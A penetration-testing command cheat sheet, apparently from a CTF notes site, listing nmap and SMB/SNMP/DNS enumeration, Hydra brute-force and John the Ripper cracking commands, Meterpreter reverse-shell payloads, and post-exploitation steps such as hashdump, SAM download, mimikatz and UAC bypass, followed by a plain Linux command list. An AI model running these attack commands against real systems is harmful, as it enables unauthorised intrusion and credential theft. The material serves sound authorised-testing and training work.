<p><strong>Also Read- <a href="https://hackersonlineclub.com/nmap-commands-cheatsheet/">NMAP Commands Cheatsheet</a></strong></p>
<p>Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.</p>
<p>It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.</p>
<p><strong>Command Description</strong></p>
<ul>
<li><strong>nmap -v -sS -A -T4 target</strong> <strong>–</strong> Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services</li>
<li><strong>nmap -v -sS -p–A -T4 target –</strong> As above but scans all TCP ports (takes a lot longer)</li>
<li><strong>nmap -v -sU -sS -p- -A -T4 target-</strong> As above but scans all TCP ports and UDP scan (takes even longer)</li>
<li><strong>nmap -v -p 445 –script=smb-check-vulns–script-args=unsafe=1 192.168.1.X-</strong> Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover</li>
<li><em><em>ls /usr/share/nmap/scripts/</em> | grep ftp-</em>* Search nmap scripts for keywords</li>
</ul>
<h3 id="smb-enumeration"><a class="header" href="#smb-enumeration">SMB enumeration</a></h3>
<p>In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network</p>
<p><strong>Command Description</strong></p>
<ul>
<li><strong>nbtscan 192.168.1.0/24 –</strong> Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain</li>
<li><strong>enum4linux -a target-ip</strong> Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing</li>
</ul>
<h3 id="other-host-discovery"><a class="header" href="#other-host-discovery">Other Host Discovery</a></h3>
<p>Other methods of host discovery, that don’t use nmap</p>
<p><strong>Command Description</strong></p>
<ul>
<li><strong>netdiscover -r 192.168.1.0/24-</strong> Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site</li>
</ul>
<p><strong>SMB Enumeration</strong></p>
<p>Enumerate Windows shares / Samba shares.</p>
<ul>
<li><strong>nbtscan 192.168.1.0/24-</strong> Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain</li>
<li><strong>enum4linux -a target-ip-</strong> Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing</li>
</ul>
<h3 id="python-local-web-server"><a class="header" href="#python-local-web-server">Python Local Web Server</a></h3>
<p>Python local web server command, handy for serving up shells and exploits on an attacking machine.</p>
<ul>
<li><strong>python -m SimpleHTTPServer 80</strong> Run a basic http server, great for serving up shells etc</li>
</ul>
<h3 id="mounting-file-shares"><a class="header" href="#mounting-file-shares">Mounting File Shares</a></h3>
<p>How to mount NFS / CIFS, Windows and Linux file shares.</p>
<ul>
<li><strong>mount 192.168.1.1:/vol/share /mnt/nfs</strong> Mount NFS share to /mnt/nfs</li>
<li><strong>mount -t cifs -o username=user,password=pass</strong>
<strong>,domain=blah //192.168.1.X/share-name /mnt/cifs</strong> Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)</li>
<li><strong>net use Z: \win-server\share password</strong>
<strong>/user:domain\janedoe /savecred /p:no</strong> Mount a Windows share on Windows from the command line</li>
<li><strong>apt-get install smb4k -y</strong> Install smb4k on Kali, useful Linux GUI for browsing SMB shares</li>
</ul>
<h3 id="basic-fingerprinting"><a class="header" href="#basic-fingerprinting">Basic FingerPrinting</a></h3>
<p>A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.</p>
<pre><code>nc -v 192.168.1.1 25
telnet 192.168.1.1 25 - Basic versioning / fingerprinting via displayed banner
</code></pre>
<h3 id="snmp-enumeration"><a class="header" href="#snmp-enumeration">SNMP Enumeration</a></h3>
<p>SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.</p>
<pre><code>snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts
</code></pre>
<h3 id="dns-zone-transfers"><a class="header" href="#dns-zone-transfers">DNS Zone Transfers</a></h3>
<ul>
<li><strong>nslookup -&gt; set type=any -&gt; ls -d blah.com</strong> Windows DNS zone transfer</li>
<li><strong>dig axfr blah.com @ns1.blah.com</strong> Linux DNS zone transfer</li>
</ul>
<h3 id="dnsrecon"><a class="header" href="#dnsrecon">DNSRecon</a></h3>
<p>DNSRecon provides the ability to perform:</p>
<ol>
<li>Check all NS Records for Zone Transfers</li>
<li>Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)</li>
<li>Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion</li>
<li>Check for Wildcard Resolution</li>
<li>Brute Force subdomain and host A and AAAA records given a domain and a wordlist</li>
<li>Perform a PTR Record lookup for a given IP Range or CIDR</li>
<li>Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check</li>
<li>Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google</li>
</ol>
<pre><code>DNS Enumeration Kali - DNSReconroot:~#
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
</code></pre>
<h3 id="http--https-webserver-enumeration"><a class="header" href="#http--https-webserver-enumeration">HTTP / HTTPS Webserver Enumeration</a></h3>
<ul>
<li><strong>nikto -h 192.168.1.1</strong> Perform a nikto scan against target</li>
<li><strong>dirbuster</strong> Configure via GUI, CLI input doesn’t work most of the time</li>
</ul>
<h3 id="packet-inspection"><a class="header" href="#packet-inspection">Packet Inspection</a></h3>
<ul>
<li><strong>tcpdump tcp port 80 -w output.pcap -i eth0</strong> tcpdump for port 80 on interface eth0, outputs to output.pcap</li>
</ul>
<h3 id="username-enumeration"><a class="header" href="#username-enumeration">Username Enumeration</a></h3>
<p>Some techniques used to remotely enumerate users on a target system.</p>
<p><strong>SMB User Enumeration</strong></p>
<ul>
<li><strong>python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX-</strong></li>
</ul>
<p>Description- Enumerate users from SMB</p>
<ul>
<li><strong>ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB /</strong></li>
</ul>
<p>Description- enumerate users from SMB</p>
<p><strong>SNMP User Enumeration</strong></p>
<ul>
<li><strong>snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25|cut -d” “ -f4 –</strong></li>
</ul>
<p>Description- Enmerate users from SNMP</p>
<ul>
<li><strong>python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX</strong></li>
</ul>
<p>Description- Enmerate users from SNMP</p>
<ul>
<li><strong>nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt(then grep)</strong></li>
</ul>
<p>Description- Search for SNMP servers with nmap, grepable output</p>
<h3 id="passwords"><a class="header" href="#passwords">Passwords</a></h3>
<p><strong>Wordlists</strong></p>
<ul>
<li><strong>/usr/share/wordlists</strong>     –  Linux word lists</li>
</ul>
<h3 id="brute-forcing-services"><a class="header" href="#brute-forcing-services">Brute Forcing Services</a></h3>
<p><strong>Hydra FTP Brute Force</strong></p>
<p>Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.</p>
<ul>
<li><strong>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f</strong>
<strong>192.168.X.XXX ftp -V</strong> Hydra FTP brute force</li>
</ul>
<p><strong>Hydra POP3 Brute Force</strong></p>
<ul>
<li><strong>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f</strong>
<strong>192.168.X.XXX pop3 -V</strong> Hydra POP3 brute force</li>
</ul>
<p><strong>Hydra SMTP Brute Force</strong></p>
<p><strong>hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V</strong> Hydra SMTP brute force
Use -t to limit concurrent connections, example: -t 15</p>
<h3 id="password-cracking"><a class="header" href="#password-cracking">Password Cracking</a></h3>
<p><strong>John The Ripper – JTR</strong></p>
<p>John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked.</p>
<p>Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.</p>
<ul>
<li><strong>john –wordlist=/usr/share/wordlists/rockyou.txt hashes</strong> JTR password cracking</li>
<li><strong>john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt</strong> JTR forced descrypt cracking with wordlist</li>
<li><strong>john –format=descrypt hash –show</strong> JTR forced descrypt brute force cracking</li>
</ul>
<p><strong>Also Read- <a href="https://hackersonlineclub.com/metasploit-tutorial-metasploit-cheatsheet/">Metasploit Commands Cheatsheet</a></strong></p>
<h3 id="meterpreter-payloads"><a class="header" href="#meterpreter-payloads">Meterpreter Payloads</a></h3>
<ul>
<li>
<p><strong>Windows reverse meterpreter payload</strong>
<strong>set payload windows/meterpreter/reverse_tcp</strong> Windows reverse tcp payload</p>
</li>
<li>
<p><strong>Windows VNC Meterpreter payload</strong></p>
<pre><code>set payload windows/vncinject/reverse_tcp

set ViewOnly false
</code></pre>
</li>
</ul>
<pre><code>Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload
</code></pre>
<h3 id="meterpreter-cheat-sheet"><a class="header" href="#meterpreter-cheat-sheet">Meterpreter Cheat Sheet</a></h3>
<p>Useful meterpreter commands.</p>
<ul>
<li><strong>upload file c:\windows</strong> Meterpreter upload file to Windows target</li>
<li><strong>download c:\windows\repair\sam /tmp</strong> Meterpreter download file from Windows target</li>
<li><strong>download c:\windows\repair\sam /tmp</strong> Meterpreter download file from Windows target</li>
<li><strong>execute -f c:\windows\temp\exploit.exe Meterpreter run .exe on target –</strong> handy for executing uploaded exploits</li>
<li><strong>execute -f cmd -c</strong> Creates new channel with cmd shell</li>
<li><strong>ps</strong> Meterpreter show processes</li>
<li><strong>shell</strong> Meterpreter get shell on the target</li>
<li><strong>getsystem</strong> Meterpreter attempts priviledge escalation the target</li>
<li><strong>hashdump</strong> Meterpreter attempts to dump the hashes on the target</li>
<li><strong>portfwd add –l 3389 –p 3389 –r target</strong> Meterpreter create port forward to target machine</li>
<li><strong>portfwd delete –l 3389 –p 3389 –r target</strong> Meterpreter delete port forward</li>
</ul>
<h3 id="common-metasploit-modules"><a class="header" href="#common-metasploit-modules">Common Metasploit Modules</a></h3>
<p>Local Windows Metasploit Modules (exploits)</p>
<p><strong>use exploit/windows/local/bypassuac-</strong> Bypass UAC on Windows 7 + Set target + arch, x86/64</p>
<h3 id="auxilary-metasploit-modules"><a class="header" href="#auxilary-metasploit-modules">Auxilary Metasploit Modules</a></h3>
<ul>
<li><strong>use auxiliary/scanner/http/dir_scanner</strong> Metasploit HTTP directory scanner</li>
<li><strong>use auxiliary/scanner/http/jboss_vulnscan</strong> Metasploit JBOSS vulnerability scanner</li>
<li><strong>use auxiliary/scanner/mssql/mssql_login</strong> Metasploit MSSQL Credential Scanner</li>
<li><strong>use auxiliary/scanner/mysql/mysql_version</strong> Metasploit MSSQL Version Scanner</li>
<li><strong>use auxiliary/scanner/oracle/oracle_login</strong> Metasploit Oracle Login Module</li>
</ul>
<h3 id="metasploit-powershell-modules"><a class="header" href="#metasploit-powershell-modules">Metasploit Powershell Modules</a></h3>
<ul>
<li><strong>use exploit/multi/script/web_delivery</strong> Metasploit powershell payload delivery module</li>
<li><strong>post/windows/manage/powershell/exec_powershell</strong> Metasploit upload and run powershell script through a session</li>
<li><strong>use exploit/multi/http/jboss_maindeployer</strong> Metasploit JBOSS deploy</li>
<li><strong>use exploit/windows/mssql/mssql_payload</strong> Metasploit MSSQL payload</li>
</ul>
<h3 id="post-exploit-windows-metasploit-modules"><a class="header" href="#post-exploit-windows-metasploit-modules">Post Exploit Windows Metasploit Modules</a></h3>
<ul>
<li><strong>run post/windows/gather/win_privs</strong> Metasploit show privileges of current user</li>
<li><strong>use post/windows/gather/credentials/gpp</strong> Metasploit grab GPP saved passwords</li>
<li><strong>load mimikatz -&gt; wdigest</strong> Metasplit load Mimikatz</li>
<li><strong>run post/windows/gather/local_admin_search_enum</strong> Identify other machines that the supplied domain user has administrative access to</li>
</ul>
<h3 id="amap"><a class="header" href="#amap"><strong>Amap</strong></a></h3>
<p>The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.</p>
<p>It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.</p>
<pre><code>root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 - APPLICATION MAPPING mode
</code></pre>
<pre><code>Total amount of tasks to perform in plain connect mode: 23

Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http – banner: &lt;!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;501 Method Not Implemented&lt;/title&gt;\n&lt;/head&gt;&lt;body&gt;\n&lt;h1&gt;Method Not Implemented&lt;/h1&gt;\n&lt;p&gt; to /index.html not supported.&lt;br /&gt;\n&lt;/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 – banner: &lt;!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;501 Method Not Implemented&lt;/title&gt;\n&lt;/head&gt;&lt;body&gt;\n&lt;h1&gt;Method Not Implemented&lt;/h1&gt;\n&lt;p&gt; to /index.html not supported.&lt;br /&gt;\n&lt;/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections …

amap v5.4 finished at 2014-05-13 19:07:22
</code></pre>
<h3 id="maltego"><a class="header" href="#maltego"><strong>Maltego</strong></a></h3>
<p>Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.</p>
<pre><code>root@kali:~# cat /opt/Teeth/README.txt
NB NB: This runs on Kali Linux
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Make directory /opt/Teeth/
#Copy tgz to /opt/Teeth/
#Untar
</code></pre>
<p>Load the config file called /opt/Teeth/etc/Maltego_config.mtz file into Maltego.</p>
<p><strong>Also See: <a href="https://hackersonlineclub.com/how-to-run-maltego-cyber-intelligence-and-forensics-software/">How To Run Maltego?</a></strong></p>
<p>This is painless:</p>
<ol>
<li>Open Maltego Tungsten (or Radium)</li>
<li>Click top left globe/sphere (Application button)</li>
<li>Import -&gt; Import configuration, choose /opt/Teeth/etc/Maltego_config.mtz</li>
</ol>
<p>Notes
———
Config file is in /opt/Teeth/etc/TeethConfig.txt
Everything can be set in the config file.</p>
<p>Log file is /var/log/Teeth.log, tail -f it while you running transforms for
real time logs of what’s happening.</p>
<p>You can set DEBUG/INFO. DEBUG is useful for seeing progress – set in
/opt/Teeth/units/TeethLib.py line 26</p>
<p><strong>Look in cache/ directory. Here you find caches of:</strong></p>
<ol>
<li>Nmap results</li>
<li>Mirrors</li>
<li>SQLMAP results</li>
</ol>
<p>You need to remove cache files by hand if you no longer want them.
You can run housekeep/clear_cache.sh but it removes EVERYTHING.</p>
<p>The WP brute transform uses Metasploit.Start Metasploit server so:</p>
<pre><code>msfconsole -r /opt/Teeth/static/Teeth-MSF.rc
</code></pre>
<p>It takes a while to start, so be patient.</p>
<p>In /housekeep is killswitch.sh – it’s the same as kill all python.</p>
<hr />
<p><strong>Crackle</strong></p>
<p>Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.</p>
<p>With the STK and LTK, all communications between the master and the slave can be decrypted.</p>
<pre><code>root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap
</code></pre>
<p>!!!
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)
!!!</p>
<p>Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3</p>
<p><strong>A-Z LINUX COMMANDS</strong></p>
<p><strong>a</strong>
apropos : Search Help manual pages (man -k)
apt-get : Search for and install software packages (Debian)
aptitude : Search for and install software packages (Debian)
aspell : Spell Checker
awk : Find and Replace text, database sort/validate/index</p>
<p><strong>b</strong>
basename : Strip directory and suffix from filenames
bash : GNU Bourne-Again SHell
bc : Arbitrary precision calculator language
bg : Send to background
break : Exit from a loop
builtin : Run a shell builtin
bzip2 : Compress or decompress named file(s)</p>
<p><strong>c</strong>
cal : Display a calendar
case : Conditionally perform a command
cat : Concatenate and print (display) the content of files
cd : Change Directory
cfdisk : Partition table manipulator for Linux
chgrp : Change group ownership
chmod : Change access permissions
chown : Change file owner and group
chroot : Run a command with a different root directory
chkconfig : System services (runlevel)
cksum : Print CRC checksum and byte counts
clear : Clear terminal screen
cmp : Compare two files
comm : Compare two sorted files line by line
command : Run a command – ignoring shell functions
continue : Resume the next iteration of a loop
cp : Copy one or more files to another location
cron : Daemon to execute scheduled commands
crontab : Schedule a command to run at a later time
csplit : Split a file into context-determined pieces
cut : Divide a file into several parts</p>
<p><strong>d</strong>
date : Display or change the date &amp; time
dc : Desk Calculator
dd : Convert and copy a file, write disk headers, boot records
ddrescue : Data recovery tool
declare : Declare variables and give them attributes
df : Display free disk space
diff : Display the differences between two files
diff3 : Show differences among three files
dig : DNS lookup
dir : Briefly list directory contents
dircolors : Colour setup for `ls’
dirname : Convert a full pathname to just a path
dirs : Display list of remembered directories
dmesg : Print kernel &amp; driver messages
du : Estimate file space usage</p>
<p><strong>e</strong>
echo : Display message on screen
egrep : Search file(s) for lines that match an extended expression
eject : Eject removable media
enable : Enable and disable builtin shell commands
env : Environment variables
ethtool : Ethernet card settings
eval : Evaluate several commands/arguments
exec : Execute a command
exit : Exit the shell
expect : Automate arbitrary applications accessed over a terminal
expand : Convert tabs to spaces
export : Set an environment variable
expr : Evaluate expressions</p>
<p><strong>f</strong>
false : Do nothing, unsuccessfully
fdformat : Low-level format a floppy disk
fdisk : Partition table manipulator for Linux
fg : Send job to foreground
fgrep : Search file(s) for lines that match a fixed string
file : Determine file type
find : Search for files that meet a desired criteria
fmt : Reformat paragraph text
fold : Wrap text to fit a specified width.
for : Expand words, and execute commands
format : Format disks or tapes
free : Display memory usage
fsck : File system consistency check and repair
ftp : File Transfer Protocol
function : Define Function Macros
fuser : Identify/kill the process that is accessing a file</p>
<p><strong>g</strong>
gawk : Find and Replace text within file(s)
getopts : Parse positional parameters
grep : Search file(s) for lines that match a given pattern
groupadd : Add a user security group
groupdel : Delete a group
groupmod : Modify a group
groups : Print group names a user is in
gzip : Compress or decompress named file(s)</p>
<p><strong>h</strong>
hash : Remember the full pathname of a name argument
head : Output the first part of file(s)
help : Display help for a built-in command
history : Command History
hostname : Print or set system name</p>
<p><strong>i</strong>
iconv : Convert the character set of a file
id : Print user and group id’s
if : Conditionally perform a command
ifconfig : Configure a network interface
ifdown : Stop a network interface
ifup Start a network interface up
import : Capture an X server screen and save the image to file
install : Copy files and set attributes</p>
<p><strong>j</strong>
jobs : List active jobs
join : Join lines on a common field</p>
<p><strong>k</strong>
kill : Stop a process from running
killall : Kill processes by name</p>
<p><strong>l</strong>
less : Display output one screen at a time
let : Perform arithmetic on shell variables
ln : Create a symbolic link to a file
local : Create variables
locate : Find files
logname : Print current login name
logout : Exit a login shell
look : Display lines beginning with a given string
lpc : Line printer control program
lpr : Off line print
lprint : Print a file
lprintd : Abort a print job
lprintq : List the print queue
lprm : Remove jobs from the print queue
ls : List information about file(s)
lsof : List open files</p>
<p><strong>m</strong>
make : Recompile a group of programs
man : Help manual
mkdir : Create new folder(s)
mkfifo : Make FIFOs (named pipes)
mkisofs : Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod : Make block or character special files
more : Display output one screen at a time
mount : Mount a file system
mtools : Manipulate MS-DOS files
mtr : Network diagnostics (traceroute/ping)
mv : Move or rename files or directories
mmv : Mass Move and rename (files)</p>
<p><strong>n</strong>
netstat : Networking information
nice : Set the priority of a command or job
nl : Number lines and write files
nohup : Run a command immune to hangups
notify-send : Send desktop notifications
nslookup : Query Internet name servers interactively</p>
<p><strong>o</strong>
open : Open a file in its default application
op : Operator access</p>
<p><strong>p</strong>
passwd : Modify a user password
paste : Merge lines of files
pathchk : Check file name portability
ping : Test a network connection
pkill : Stop processes from running
popd : Restore the previous value of the current directory
pr : Prepare files for printing
printcap : Printer capability database
printenv : Print environment variables
printf : Format and print data
ps : Process status
pushd : Save and then change the current directory
pwd : Print Working Directory</p>
<p><strong>q</strong>
quota : Display disk usage and limits
quotacheck : Scan a file system for disk usage
quotactl : Set disk quotas</p>
<p><strong>r</strong>
ram : ram disk device
rcp : Copy files between two machines
read : Read a line from standard input
readarray : Read from stdin into an array variable
readonly : Mark variables/functions as readonly
reboot : Reboot the system
rename : Rename files
renice : Alter priority of running processes
remsync : Synchronize remote files via email
return : Exit a shell function
rev : Reverse lines of a file
rm : Remove files
rmdir : Remove folder(s)
rsync : Remote file copy (Synchronize file trees)</p>
<p><strong>s</strong>
screen : Multiplex terminal, run remote shells via ssh
scp : Secure copy (remote file copy)
sdiff : Merge two files interactively
sed : Stream Editor
select : Accept keyboard input
seq : Print numeric sequences
set : Manipulate shell variables and functions
sftp : Secure File Transfer Program
shift : Shift positional parameters
shopt : Shell Options
shutdown : Shutdown or restart linux
sleep : Delay for a specified time
slocate : Find files
sort : Sort text files
source : Run commands from a file `.’
split : Split a file into fixed-size pieces
ssh : Secure Shell client (remote login program)
strace : Trace system calls and signals
su : Substitute user identity
sudo : Execute a command as another user
sum : Print a checksum for a file
suspend : Suspend execution of this shell
symlink : Make a new name for a file
sync : Synchronize data on disk with memory</p>
<p><strong>t</strong>
tail : Output the last part of file
tar : Tape ARchiver
tee : Redirect output to multiple files
test : Evaluate a conditional expression
time : Measure Program running time
times : User and system times
touch : Change file timestamps
top : List processes running on the system
traceroute : Trace Route to Host
trap : Run a command when a signal is set(bourne)
tr : Translate, squeeze, and/or delete characters
true : Do nothing, successfully
tsort : Topological sort
tty : Print filename of terminal on stdin
type : Describe a command</p>
<p><strong>u</strong>
ulimit : Limit user resources
umask : Users file creation mask
umount : Unmount a device
unalias : Remove an alias
uname : Print system information
unexpand : Convert spaces to tabs
uniq : Uniquify files
units : Convert units from one scale to another
unset : Remove variable or function names
unshar : Unpack shell archive scripts
until : Execute commands (until error)
uptime : Show uptime
useradd : Create new user account
userdel : Delete a user account
usermod : Modify user account
users : List users currently logged in
uuencode : Encode a binary file
uudecode : Decode a file created by uuencode</p>
<p><strong>v</strong>
v : Verbosely list directory contents (<code>ls -l -b’) vdir : Verbosely list directory contents (</code>ls -l -b’)
vi : Text Editor
vmstat : Report virtual memory statistics</p>
<p><strong>w</strong>
wait : Wait for a process to complete
watch: Execute/display a program periodically
wc : Print byte, word, and line counts
whereis : Search the user’s $path, man pages and source files for a program
which : Search the user’s $path for a program file
while : Execute commands
who : Print all usernames currently logged in
whoami : Print the current user id and name (`id -un’)
wget : Retrieve web pages or files via HTTP, HTTPS or FTP
write : Send a message to another user</p>
<p><strong>x</strong>
xargs : Execute utility, passing constructed argument list(s)
xdg-open : Open a file or URL in the user’s preferred application.
yes : Print a string until interrupted.</p>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../../posts/ctf/pwn_format_string_vulnerability.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>

                            <a rel="next" href="../../posts/ctf/google_dorks_2023_lists.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../../posts/ctf/pwn_format_string_vulnerability.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>

                    <a rel="next" href="../../posts/ctf/google_dorks_2023_lists.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
            </nav>

        </div>



        <script>
            window.playground_line_numbers = true;
        </script>

        <script>
            window.playground_copyable = true;
        </script>

        <script src="../../ace.js"></script>
        <script src="../../editor.js"></script>
        <script src="../../mode-rust.js"></script>
        <script src="../../theme-dawn.js"></script>
        <script src="../../theme-tomorrow_night.js"></script>

        <script src="../../elasticlunr.min.js"></script>
        <script src="../../mark.min.js"></script>
        <script src="../../searcher.js"></script>

        <script src="../../clipboard.min.js"></script>
        <script src="../../highlight.js"></script>
        <script src="../../book.js"></script>

        <!-- Custom JS scripts -->
        <script src="../../src/js/custom.js"></script>


    </div>
    </body>
</html>
